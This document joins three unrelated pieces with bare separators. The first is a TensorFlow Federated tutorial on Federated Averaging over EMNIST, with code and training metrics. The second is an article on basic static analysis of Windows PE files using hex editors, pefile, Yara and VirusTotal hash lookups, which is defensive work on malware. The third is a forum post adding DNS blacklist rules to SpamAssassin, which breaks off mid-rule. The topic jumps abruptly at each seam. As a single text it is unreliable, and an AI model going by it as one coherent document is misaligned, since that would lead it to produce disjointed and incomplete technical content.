print('Number of client datasets: {l}'.format(l=len(federated_train_data)))
print('First dataset: {d}'.format(d=federated_train_data[0]))
Number of client datasets: 10 First dataset: <DatasetV1Adapter shapes: OrderedDict([(x, (None, 784)), (y, (None, 1))]), types: OrderedDict([(x, tf.float32), (y, tf.int32)])>
Creating a model with Keras
If you are using Keras, you likely already have code that constructs a Keras model. Here's an example of a simple model that will suffice for our needs.
def create_keras_model():
return tf.keras.models.Sequential([
tf.keras.layers.Input(shape=(784,)),
tf.keras.layers.Dense(10, kernel_initializer='zeros'),
tf.keras.layers.Softmax(),
])
In order to use any model with TFF, it needs to be wrapped in an instance of the tff.learning.Model interface, which exposes methods to stamp the model's forward pass, metadata properties, etc., similarly to Keras, but also introduces additional elements, such as ways to control the process of computing federated metrics. Let's not worry about this for now; if you have a Keras model like the one we've just defined above, you can have TFF wrap it for you by invoking tff.learning.from_keras_model, passing the model and a sample data batch as arguments, as shown below.
def model_fn():
# We _must_ create a new model here, and _not_ capture it from an external
# scope. TFF will call this within different graph contexts.
keras_model = create_keras_model()
return tff.learning.from_keras_model(
keras_model,
input_spec=preprocessed_example_dataset.element_spec,
loss=tf.keras.losses.SparseCategoricalCrossentropy(),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
Training the model on federated data
Now that we have a model wrapped as tff.learning.Model for use with TFF, we can let TFF construct a Federated Averaging algorithm by invoking the helper function tff.learning.build_federated_averaging_process, as follows.
Keep in mind that the argument needs to be a constructor (such as model_fn above), not an already-constructed instance, so that the construction of your model can happen in a context controlled by TFF (if you're curious about the reasons for this, we encourage you to read the follow-up tutorial on custom algorithms).
One critical note on the Federated Averaging algorithm below: there are two optimizers, a client optimizer and a server optimizer. The client optimizer is only used to compute local model updates on each client. The server optimizer applies the averaged update to the global model at the server. In particular, this means that the choice of optimizer and learning rate may need to be different than the ones you have used to train the model on a standard i.i.d. dataset. We recommend starting with regular SGD, possibly with a smaller learning rate than usual. The learning rate we use here has not been carefully tuned, so feel free to experiment.
iterative_process = tff.learning.build_federated_averaging_process(
model_fn,
client_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=0.02),
server_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=1.0))
What just happened? TFF has constructed a pair of federated computations and packaged them into a tff.templates.IterativeProcess in which these computations are available as a pair of properties, initialize and next.
In a nutshell, federated computations are programs in TFF's internal language that can express various federated algorithms (you can find more about this in the custom algorithms tutorial). In this case, the two computations generated and packed into iterative_process implement Federated Averaging.
It is a goal of TFF to define computations in a way that they could be executed in real federated learning settings, but currently only a local execution simulation runtime is implemented. To execute a computation in the simulator, you simply invoke it like a Python function. This default interpreted environment is not designed for high performance, but it will suffice for this tutorial; we expect to provide higher-performance simulation runtimes to facilitate larger-scale research in future releases.
Let's start with the initialize computation. As is the case for all federated computations, you can think of it as a function. The computation takes no arguments and returns one result: the representation of the state of the Federated Averaging process on the server. While we don't want to dive into the details of TFF, it may be instructive to see what this state looks like. You can visualize it as follows.
str(iterative_process.initialize.type_signature)
'( -> <model=<trainable=<float32[784,10],float32[10]>,non_trainable=<>>,optimizer_state=<int64>,delta_aggregate_state=<value_sum_process=<>,weight_sum_process=<>>,model_broadcast_state=<>>@SERVER)'
While the above type signature may at first seem a bit cryptic, you can recognize that the server state consists of a model (the initial model parameters for MNIST that will be distributed to all devices) and optimizer_state (additional information maintained by the server, such as the number of rounds to use for hyperparameter schedules, etc.).
Let's invoke the initialize computation to construct the server state.
state = iterative_process.initialize()
The second of the pair of federated computations, next, represents a single round of Federated Averaging, which consists of pushing the server state (including the model parameters) to the clients, on-device training on their local data, collecting and averaging model updates, and producing a new updated model at the server.
Conceptually, you can think of next as having a functional type signature that looks as follows.
SERVER_STATE, FEDERATED_DATA -> SERVER_STATE, TRAINING_METRICS
In particular, one should think about next() not as being a function that runs on a server, but rather as a declarative functional representation of the entire decentralized computation: some of the inputs are provided by the server (SERVER_STATE), but each participating device contributes its own local dataset.
Let's run a single round of training and visualize the results. We can use the federated data we've already generated above for a sample of users.
state, metrics = iterative_process.next(state, federated_train_data)
print('round 1, metrics={}'.format(metrics))
round 1, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.11502057), ('loss', 3.244929)]))])
Let's run a few more rounds. As noted earlier, typically at this point you would pick a subset of your simulation data from a new randomly selected sample of users for each round in order to simulate a realistic deployment in which users continuously come and go, but in this interactive notebook, for the sake of demonstration, we'll just reuse the same users so that the system converges quickly.
NUM_ROUNDS = 11
for round_num in range(2, NUM_ROUNDS):
state, metrics = iterative_process.next(state, federated_train_data)
print('round {:2d}, metrics={}'.format(round_num, metrics))
round 2, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.14609054), ('loss', 2.9141645)]))]) round 3, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.15205762), ('loss', 2.9237952)]))]) round 4, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.18600823), ('loss', 2.7629454)]))]) round 5, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.20884773), ('loss', 2.622908)]))]) round 6, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.21872428), ('loss', 2.543587)]))]) round 7, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.2372428), ('loss', 2.4210362)]))]) round 8, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.28209877), ('loss', 2.2297976)]))]) round 9, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.2685185), ('loss', 2.195803)]))]) round 10, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.33868313), ('loss', 2.0523348)]))])
Training loss is decreasing after each round of federated training, indicating that the model is converging. There are some important caveats with these training metrics, however; see the Evaluation section later in this tutorial.
Displaying model metrics in TensorBoard
Next, let's visualize the metrics from these federated computations using TensorBoard.
Let's start by creating the directory and the corresponding summary writer to write the metrics to.
logdir = "/tmp/logs/scalars/training/"
summary_writer = tf.summary.create_file_writer(logdir)
state = iterative_process.initialize()
Plot the relevant scalar metrics with the same summary writer.
with summary_writer.as_default():
for round_num in range(1, NUM_ROUNDS):
state, metrics = iterative_process.next(state, federated_train_data)
for name, value in metrics['train'].items():
tf.summary.scalar(name, value, step=round_num)
Start TensorBoard with the root log directory specified above. It can take a few seconds for the data to load.
!ls {logdir}
%tensorboard --logdir {logdir} --port=0
events.out.tfevents.1604020204.isim77-20020ad609500000b02900f40f27a5f6.prod.google.com.686098.10633.v2 events.out.tfevents.1604020602.isim77-20020ad609500000b02900f40f27a5f6.prod.google.com.794554.10607.v2 Launching TensorBoard... <IPython.core.display.Javascript at 0x7fc5e8d3c128>
# Uncomment and run this cell to clean your directory of old output for
# future graphs from this directory. We don't run it by default so that if
# you do a "Runtime > Run all" you don't lose your results.
# !rm -R /tmp/logs/scalars/*
To view evaluation metrics the same way, you can create a separate eval folder, like "logs/scalars/eval", to write to TensorBoard.
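A minimal sketch of what that could look like (this code is not part of the original notebook; it reuses the evaluation computation that is constructed later in the Evaluation section, and the logdir path is just an assumption):
eval_logdir = "/tmp/logs/scalars/eval/"  # assumed path
eval_summary_writer = tf.summary.create_file_writer(eval_logdir)
with eval_summary_writer.as_default():
  for round_num in range(1, NUM_ROUNDS):
    state, metrics = iterative_process.next(state, federated_train_data)
    # evaluation() is the federated evaluation computation built further below
    eval_metrics = evaluation(state.model, federated_train_data)
    tf.summary.scalar('eval_loss', eval_metrics.loss, step=round_num)
    tf.summary.scalar('eval_accuracy', eval_metrics.accuracy, step=round_num)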
Customizing the model implementation
However, tff.learning provides a lower-level model interface, tff.learning.Model, that exposes the minimal functionality necessary for using a model for federated learning. Directly implementing this interface (possibly still using building blocks like tf.keras.layers) allows for maximum customization without modifying the internals of the federated learning algorithms.
So let's do it all over again from scratch.
Defining model variables, forward pass, and metrics
The first step is to identify the TensorFlow variables we are going to work with. In order to make the following code more legible, let's define a data structure to represent the entire set. This will include variables such as weights and bias that we will train, as well as variables that will hold various cumulative statistics and counters we will update during training, such as loss_sum, accuracy_sum, and num_examples.
MnistVariables = collections.namedtuple(
'MnistVariables', 'weights bias num_examples loss_sum accuracy_sum')
Here is a method that creates the variables. For simplicity, we represent all the statistics as tf.float32, as that eliminates the need for type conversions at a later stage. Wrapping the variable initializers as lambdas is a requirement imposed by resource variables.
def create_mnist_variables():
return MnistVariables(
weights=tf.Variable(
lambda: tf.zeros(dtype=tf.float32, shape=(784, 10)),
name='weights',
trainable=True),
bias=tf.Variable(
lambda: tf.zeros(dtype=tf.float32, shape=(10)),
name='bias',
trainable=True),
num_examples=tf.Variable(0.0, name='num_examples', trainable=False),
loss_sum=tf.Variable(0.0, name='loss_sum', trainable=False),
accuracy_sum=tf.Variable(0.0, name='accuracy_sum', trainable=False))
With the variables for model parameters and cumulative statistics in place, we can now define the forward-pass method that computes the loss, emits predictions, and updates the cumulative statistics for a single batch of input data, as follows.
def mnist_forward_pass(variables, batch):
y = tf.nn.softmax(tf.matmul(batch['x'], variables.weights) + variables.bias)
predictions = tf.cast(tf.argmax(y, 1), tf.int32)
flat_labels = tf.reshape(batch['y'], [-1])
loss = -tf.reduce_mean(
tf.reduce_sum(tf.one_hot(flat_labels, 10) * tf.math.log(y), axis=[1]))
accuracy = tf.reduce_mean(
tf.cast(tf.equal(predictions, flat_labels), tf.float32))
num_examples = tf.cast(tf.size(batch['y']), tf.float32)
variables.num_examples.assign_add(num_examples)
variables.loss_sum.assign_add(loss * num_examples)
variables.accuracy_sum.assign_add(accuracy * num_examples)
return loss, predictions
Next, we define a function that returns a set of local metrics, again using TensorFlow. These are the values (in addition to model updates, which are handled automatically) that are eligible to be aggregated to the server in a federated learning or evaluation process.
Here, we simply return the average loss and accuracy, as well as num_examples, which we will need to correctly weight the contributions from different users when computing federated aggregates.
def get_local_mnist_metrics(variables):
return collections.OrderedDict(
num_examples=variables.num_examples,
loss=variables.loss_sum / variables.num_examples,
accuracy=variables.accuracy_sum / variables.num_examples)
Finally, we need to determine how to aggregate the local metrics emitted by each device via get_local_mnist_metrics. This is the only part of the code that isn't written in TensorFlow - it is a federated computation expressed in TFF. If you'd like to dig deeper, skim the custom algorithms tutorial, but in most applications you won't really need to; variants of the pattern shown below should suffice. Here is what it looks like:
@tff.federated_computation
def aggregate_mnist_metrics_across_clients(metrics):
return collections.OrderedDict(
num_examples=tff.federated_sum(metrics.num_examples),
loss=tff.federated_mean(metrics.loss, metrics.num_examples),
accuracy=tff.federated_mean(metrics.accuracy, metrics.num_examples))
The input metrics argument corresponds to the OrderedDict returned by get_local_mnist_metrics above, but critically the values are no longer tf.Tensors - they are "boxed" as tff.Values, to make it clear that you can no longer manipulate them using TensorFlow, but only using TFF's federated operators like tff.federated_mean and tff.federated_sum. The returned dictionary of global aggregates defines the set of metrics that will be available on the server.
Constructing an instance of tff.learning.Model
With all of the above in place, we are ready to construct a model representation for use with TFF, similar to the one that is generated for you when you let TFF ingest a Keras model.
class MnistModel(tff.learning.Model):
def __init__(self):
self._variables = create_mnist_variables()
@property
def trainable_variables(self):
return [self._variables.weights, self._variables.bias]
@property
def non_trainable_variables(self):
return []
@property
def local_variables(self):
return [
self._variables.num_examples, self._variables.loss_sum,
self._variables.accuracy_sum
]
@property
def input_spec(self):
return collections.OrderedDict(
x=tf.TensorSpec([None, 784], tf.float32),
y=tf.TensorSpec([None, 1], tf.int32))
@tf.function
def forward_pass(self, batch, training=True):
del training
loss, predictions = mnist_forward_pass(self._variables, batch)
num_examples = tf.shape(batch['x'])[0]
return tff.learning.BatchOutput(
loss=loss, predictions=predictions, num_examples=num_examples)
@tf.function
def report_local_outputs(self):
return get_local_mnist_metrics(self._variables)
@property
def federated_output_computation(self):
return aggregate_mnist_metrics_across_clients
As you can see, the abstract methods and properties defined by tff.learning.Model correspond to the code snippets in the preceding section that introduced the variables and defined the loss and statistics.
Here are a few points worth highlighting:
All state that your model will use must be captured as TensorFlow variables, as TFF does not use Python at runtime (remember your code should be written such that it can be deployed to mobile devices; see the custom algorithms tutorial for a more in-depth commentary on the reasons).
Your model should describe what form of data it accepts (input_spec), as in general, TFF is a strongly-typed environment and wants to determine type signatures for all components. Declaring the format of your model's input is an essential part of it.
Although technically not required, we strongly recommend you wrap all TensorFlow logic (forward pass, metric calculations, etc.) as tf.functions, as this helps ensure the TensorFlow can be serialized, and removes the need for explicit control dependencies.
The above is sufficient for evaluation and algorithms like Federated SGD. However, for Federated Averaging, we need to specify how the model should train locally on each batch. We will specify a local optimizer when building the Federated Averaging algorithm.
Simulating federated training with the new model
With all the above in place, the remainder of the process looks like what we have already seen - just replace the model constructor with the constructor of our new model class, and use the two federated computations in the iterative process you created to cycle through training rounds.
iterative_process = tff.learning.build_federated_averaging_process(
MnistModel,
client_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=0.02))
state = iterative_process.initialize()
state, metrics = iterative_process.next(state, federated_train_data)
print('round 1, metrics={}'.format(metrics))
round 1, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 3.1527398), ('accuracy', 0.12469136)]))])
for round_num in range(2, 11):
state, metrics = iterative_process.next(state, federated_train_data)
print('round {:2d}, metrics={}'.format(round_num, metrics))
round 2, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.941014), ('accuracy', 0.14218107)]))]) round 3, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.9052832), ('accuracy', 0.14444445)]))]) round 4, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.7491086), ('accuracy', 0.17962962)]))]) round 5, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.5129666), ('accuracy', 0.19526748)]))]) round 6, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.4175923), ('accuracy', 0.23600823)]))]) round 7, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.4273515), ('accuracy', 0.24176955)]))]) round 8, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.2426176), ('accuracy', 0.2802469)]))]) round 9, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.1567981), ('accuracy', 0.295679)]))]) round 10, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.1092515), ('accuracy', 0.30843621)]))])
To see these metrics within TensorBoard, refer to the steps listed above in "Displaying model metrics in TensorBoard".
Evaluation
All of our experiments so far presented only federated training metrics - the average metrics over all batches of data trained across all clients in the round. This introduces the normal concerns about overfitting, especially since we used the same set of clients on each round for simplicity, but there is an additional notion of overfitting in training metrics specific to the Federated Averaging algorithm. This is easiest to see if we imagine each client had a single batch of data, and we train on that batch for many iterations (epochs). In this case, the local model will quickly exactly fit to that one batch, and so the local accuracy metric we average will approach 1.0. Thus, these training metrics can be taken as a sign that training is progressing, but not much more.
To perform evaluation on federated data, you can construct another federated computation designed for just this purpose, using the tff.learning.build_federated_evaluation function and passing in your model constructor as an argument. Note that unlike with Federated Averaging, where we used MnistTrainableModel, it suffices to pass the MnistModel. Evaluation does not perform gradient descent, and there is no need to construct optimizers.
For experimentation and research, when a centralized test dataset is available, Federated Learning for Text Generation demonstrates another evaluation option: taking the trained weights from federated learning, applying them to a standard Keras model, and then simply calling tf.keras.models.Model.evaluate() on a centralized dataset.
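A rough sketch of that option (not part of this tutorial's code; create_keras_model and central_test_dataset are placeholder names, and the exact weight-assignment helper depends on your TFF version):
keras_model = create_keras_model()  # assumed: a Keras model with the same architecture
keras_model.compile(
    loss=tf.keras.losses.SparseCategoricalCrossentropy(),
    metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
# Copy the federally trained weights into the Keras model, then evaluate centrally.
# On older TFF releases this may instead be
# tff.learning.assign_weights_to_keras_model(keras_model, state.model).
state.model.assign_weights_to(keras_model)
keras_model.evaluate(central_test_dataset)  # assumed: a centralized tf.data.Dataset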
evaluation = tff.learning.build_federated_evaluation(MnistModel)
You can inspect the abstract type signature of the evaluation function as follows.
str(evaluation.type_signature)
'(<server_model_weights=<trainable=<float32[784,10],float32[10]>,non_trainable=<>>@SERVER,federated_dataset={<x=float32[?,784],y=int32[?,1]>*}@CLIENTS> -> <num_examples=float32@SERVER,loss=float32@SERVER,accuracy=float32@SERVER>)'
Don't worry about the details at this point, just be aware that it takes the following general form, similar to tff.templates.IterativeProcess.next but with two important differences. First, we are not returning server state, since evaluation doesn't modify the model or any other aspect of state - you can think of it as stateless. Second, evaluation only needs the model, and doesn't require any other part of server state that might be associated with training, such as optimizer variables.
SERVER_MODEL, FEDERATED_DATA -> TRAINING_METRICS
Let's invoke evaluation on the latest state we arrived at during training. In order to extract the latest trained model from the server state, you simply access the .model member, as follows.
train_metrics = evaluation(state.model, federated_train_data)
Here's what we get. Note the numbers look marginally better than what was reported by the last round of training above. By convention, the training metrics reported by the iterative training process generally reflect the performance of the model at the beginning of the training round, so the evaluation metrics will always be one step ahead.
str(train_metrics)
'<num_examples=4860.0,loss=1.7142657041549683,accuracy=0.38683128356933594>'
Now, let's compile a test sample of federated data and rerun evaluation on the test data. The data will come from the same sample of real users, but from a distinct held-out dataset.
federated_test_data = make_federated_data(emnist_test, sample_clients)
len(federated_test_data), federated_test_data[0]
(10, <DatasetV1Adapter shapes: OrderedDict([(x, (None, 784)), (y, (None, 1))]), types: OrderedDict([(x, tf.float32), (y, tf.int32)])>)
test_metrics = evaluation(state.model, federated_test_data)
str(test_metrics)
'<num_examples=580.0,loss=1.861915111541748,accuracy=0.3362068831920624>'
This concludes the tutorial. We encourage you to play with the parameters (e.g., batch sizes, number of users, epochs, learning rates, etc.), to modify the code above to simulate training on random samples of users in each round, and to explore the other tutorials we have developed.
|
Contents
Toolkit
Hex editors
Packer detectors
Specialized utilities for examining Windows executables
The pefile Python module
Yara
Precautions
Determining the file type
Searching VirusTotal by hash
Finding and analyzing strings
Analyzing the PE header information
Analyzing the import table
Analyzing the export table
Analyzing the section table
The compilation timestamp
Analyzing the executable's resources
The Rich signature
Conclusion
Broadly speaking, when it comes to analyzing executable files, there are two approaches: static analysis and dynamic analysis.
Static analysis means analyzing a file without running it. It can be basic - in that case we do not analyze the actual processor instructions in the file, but instead look for artifacts that are atypical for ordinary files (for example, strings or the names and sequences of API functions) - or advanced, in which case the file is disassembled and its instructions are examined, looking for sequences characteristic of malware and determining exactly what the program did.
Dynamic analysis consists of examining a file by running it in a system. It can also be basic or advanced. Basic dynamic analysis is studying a file by running it without debugging tools; it amounts to tracking the events associated with the file (for example, registry access, disk operations, network activity, and so on). Advanced dynamic analysis consists of studying the behavior of the running file with debugging tools.
In this article I will cover basic static analysis techniques. Their advantages:
they produce results fairly quickly;
they are safe for your system, provided minimal precautions are taken;
they do not require setting up a special environment.
The main drawback of basic static analysis is its low effectiveness when analyzing and recognizing sophisticated malware, for example samples packed with an unknown packer or ones that fully or partially encrypt the file using advanced algorithms.
Toolkit
Hex editors
One of the main tools of basic static analysis is a hex editor. There are plenty of them, but the first that has to be mentioned is Hiew. It is the undisputed leader and a bestseller. Besides the core hex-editor functionality, it packs a lot of extra features related to file analysis: a disassembler, a viewer for the import and export sections, and an executable header analyzer. Its main drawback is that all of this is not free (although it is quite inexpensive - from 555 rubles).
Packer detectors
If you suspect that a file is packed, a packer detector can help you identify which packer was used and try to unpack the file under investigation. For a long time the undisputed leader here was PEiD, and in principle you can still use it, but support ended long ago and nobody releases new signatures for detecting packer types anymore. An alternative is Exeinfo PE.
Besides detecting packers, this program has many other features for analyzing Windows executables, and in many cases it alone is enough.
Specialized utilities for examining Windows executables
The CFF Explorer program from the Explorer Suite package is a true Swiss Army knife for the PE file researcher. It provides a huge amount of varied information about every component of a PE file's structure and, among other things, can serve as a hex editor.
So I strongly recommend CFF Explorer, all the more so because the program is free.
The pefile Python module
The pefile Python module lets you analyze PE files with nothing but the Python interpreter. With it, practically every basic static analysis operation can be implemented by writing small scripts. The beauty of it all is that you can do your PE file research on Linux.
The module is available on PyPI and can be installed via pip:
pip install pefile
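For instance, a few lines are enough to pull a file's compilation timestamp and import table (a sketch; sample.exe is a placeholder path, and the DIRECTORY_ENTRY_IMPORT attribute only exists when the file actually has an import table):
import pefile

pe = pefile.PE('sample.exe')
# compilation timestamp from the file header
print(hex(pe.FILE_HEADER.TimeDateStamp))
# imported DLLs and functions, if any
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
    for entry in pe.DIRECTORY_ENTRY_IMPORT:
        print(entry.dll)
        for imp in entry.imports:
            print('\t', imp.name)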
Yara
And rounding out the list, a very popular and in-demand tool that has become something of a standard in the antivirus industry - the Yara project. Its developers position it as a tool that helps malware researchers identify and classify malicious samples. A researcher can create descriptions for different types of malware in the form of so-called rules, using text or binary patterns.
Precautions
To keep your system safe while performing basic static analysis of suspicious files, you should:
deny read and execute operations on the file being analyzed (the "Security" tab of the "Properties" context menu);
change the file extension from .exe to something else (or remove the extension of the analyzed file altogether);
not try to open the file with text processors or browsers.
You can get by with these measures and skip the virtual environment, although for complete safety you can install, say, VirtualBox and carry out the analysis inside it (all the more so because dynamic analysis is, as a rule, impossible without a VM).
Determining the file type
I think you know that what identifies a PE file in Windows is not just the .exe, .dll, .drv, or .sys extension. It contains other distinguishing features as well. The first is the byte signature MZ (or 0x4d, 0x5a in hexadecimal) at the very beginning of the file. The second is another two-byte signature, PE, followed by two zero bytes (or 0x50, 0x45, 0x00, 0x00 in hexadecimal).
The offset of this signature relative to the start of the file is stored in the so-called DOS header, in the e_lfanew field, which sits at offset 0x3c from the start of the file.
By and large, the presence of these two signatures plus a suitable extension indicates that we are dealing with a PE file, but if you want, you can also check the value of the Magic field of the Optional Header. That value is located at offset 0x18 relative to the start of the PE signature. The value of this field determines the bitness of the executable:
a value of 0x010b means the file is 32-bit (remember that numbers are stored in memory with the bytes in reverse order, least significant byte first, so 0x010b appears as the sequence 0x0b, 0x01);
a value of 0x020b means the file is 64-bit.
You can check all of this in several ways. The first is with a hex editor.
The second is with CFF Explorer or Exeinfo PE. They clearly display the values of these signatures.
The third way is to use Python, running a script like this:
import sys

with open(sys.argv[1], 'rb') as file:
    # read the first 1000 bytes of the file (more isn't needed)
    buffer = file.read(1000)
e_lfanew = int.from_bytes(buffer[0x3c:0x40], byteorder='little')
mz_signature = buffer[0x0:0x2]
pe_signature = buffer[e_lfanew:e_lfanew + 0x4]
magic = buffer[e_lfanew + 0x18:e_lfanew + 0x1a]
if mz_signature == b'MZ' and pe_signature == b'PE\x00\x00':
    if magic == b'\x0b\x01':
        print('File', sys.argv[1], 'is a PE32 Windows executable.')
    elif magic == b'\x0b\x02':
        print('File', sys.argv[1], 'is a PE64 Windows executable.')
else:
    print('File', sys.argv[1], 'is not a Windows PE file.')
Or you can use a Yara rule like this one:
import "pe" // import the Yara pe module
rule is_pe_file
{
strings:
$MZ_signature = "MZ"
condition:
($MZ_signature at 0) and (pe.is_32bit() or pe.is_64bit())
}
Searching VirusTotal by hash
You can submit not just the file itself to VirusTotal for checking, but also its hash (md5, sha1, or sha256). In that case, if the very same file has already been analyzed, VirusTotal will show the results of that analysis, and we won't expose the file itself on VirusTotal.
I'm sure you know perfectly well how to get a file's hash. At worst, you can write a small Python script:
import hashlib
with open(<path to file>, 'rb') as file:
buffer = file.read()
print('md5 =', hashlib.md5(buffer).hexdigest())
print('sha1 =', hashlib.sha1(buffer).hexdigest())
print('sha256 =', hashlib.sha256(buffer).hexdigest())
We then send the computed hash to VirusTotal, or apply my recommendations from the article "Total checkup. Using the VirusTotal API in your own projects" and automate the process with a small Python script.
import sys
import requests
## we will use version 2 of the VirusTotal API
api_url = 'https://www.virustotal.com/vtapi/v2/file/report'
## don't forget your VirusTotal API access key
params = dict(apikey=<VirusTotal API access key>, resource=str(sys.argv[1]))
response = requests.get(api_url, params=params)
if response.status_code == 200:
    result = response.json()
    if result['response_code'] == 1:
        print('Detections:', result['positives'], '/', result['total'])
        print('Scan results:')
        for key in result['scans']:
            print('\t' + key, '==>', result['scans'][key]['result'])
    elif result['response_code'] == -2:
        print('The requested object is queued for analysis.')
    elif result['response_code'] == 0:
        print('The requested object is not in the VirusTotal database.')
    else:
        print('VirusTotal response error.')
else:
    print('VirusTotal response error.')
As you can see, the script takes the hash value passed as a command-line argument, builds all the necessary requests to VirusTotal, and prints the analysis results.
If VirusTotal returns some analysis results, it means somebody has already uploaded the file in question for analysis; you can upload it again to get more up-to-date results, and the analysis can end there. But if VirusTotal does not find the file in its databases, then it makes sense to go further.
|
Hi, I have a problem (well, everything is running very well, but that's the problem): some mails coming from outside to the users in my exim installation are marked as "spam" or listed in a "blacklist", but they are "real" mail.
With the default config of vestacp (I have debian installed), all mails marked as spam are dropped; these mails don't go to the spam folder, so... why is the .spam folder created? Ô.ö
I need to mark these mails as spam and move them to the spam folder. How can I do it?
Thanks!
UPDATE**
Solved. I added all of the following; if you configure these blacklists in SpamAssassin, mail marked as spam should now go to the spam folder (also change the rule in exim from deny to warn - see the illustrative snippet after the config below!):
Add to /etc/spamassassin/local.cf
Code: Select all
header RCVD_IN_ZENSPAMHAUS eval:check_rbl('zenspamhaus-lastexternal', 'zen.spamhaus.org.')
describe RCVD_IN_ZENSPAMHAUS Relay is listed in zen.spamhaus.org
tflags RCVD_IN_ZENSPAMHAUS net
score RCVD_IN_ZENSPAMHAUS 3.0
header RCVD_IN_XMLSPAMHAUS eval:check_rbl('xblspamhaus-lastexternal', 'xbl.spamhaus.org.')
describe RCVD_IN_XMLSPAMHAUS Relay is listed in xbl.spamhaus.org
tflags RCVD_IN_XMLSPAMHAUS net
score RCVD_IN_XMLSPAMHAUS 3.0
header RCVD_IN_SBLSPAMHAUS eval:check_rbl('sblspamhaus-lastexternal', 'sbl.spamhaus.org.')
describe RCVD_IN_SBLSPAMHAUS Relay is listed in sbl.spamhaus.org
tflags RCVD_IN_SBLSPAMHAUS net
score RCVD_IN_SBLSPAMHAUS 3.0
header RCVD_IN_PSBSURRIEL eval:check_rbl('psblsurriel-lastexternal', 'psbl.surriel.com.')
describe RCVD_IN_PSBSURRIEL Relay is listed in psbl.surriel.com
tflags RCVD_IN_PSBSURRIEL net
score RCVD_IN_PSBSURRIEL 3.0
header RCVD_IN_BARRACUDACEN eval:check_rbl('bbarracuda-lastexternal', 'b.barracudacentral.org.')
describe RCVD_IN_BARRACUDACEN Relay is listed in b.barracudacentral.org
tflags RCVD_IN_BARRACUDACEN net
score RCVD_IN_BARRACUDACEN 3.0
header RCVD_IN_DULSORBS eval:check_rbl('dnsblsorbs-lastexternal', 'dul.dnsbl.sorbs.net.')
describe RCVD_IN_DULSORBS Relay is listed in dul.dnsbl.sorbs.net
tflags RCVD_IN_DULSORBS net
score RCVD_IN_DULSORBS 3.0
header RCVD_IN_SPAMFABEK eval:check_rbl('ssfabek-lastexternal', 'spamsources.fabek.dk.')
describe RCVD_IN_SPAMFABEK Relay is listed in spamsources.fabek.dk
tflags RCVD_IN_SPAMFABEK net
score RCVD_IN_SPAMFABEK 3.0
header RCVD_IN_CBLABUSEAT eval:check_rbl('abuseat-lastexternal', 'cbl.abuseat.org.')
describe RCVD_IN_CBLABUSEAT Relay is listed in cbl.abuseat.org
tflags RCVD_IN_CBLABUSEAT net
score RCVD_IN_CBLABUSEAT 3.0
header RCVD_IN_L1APEWS eval:check_rbl('apews-lastexternal', 'l1.apews.org.')
describe RCVD_IN_L1APEWS Relay is listed in l1.apews.org
tflags RCVD_IN_L1APEWS net
score RCVD_IN_L1APEWS 3.0
header RCVD_IN_BLSPAMCANIBAL eval:check_rbl('spamcannibal-lastexternal', 'bl.spamcannibal.org.')
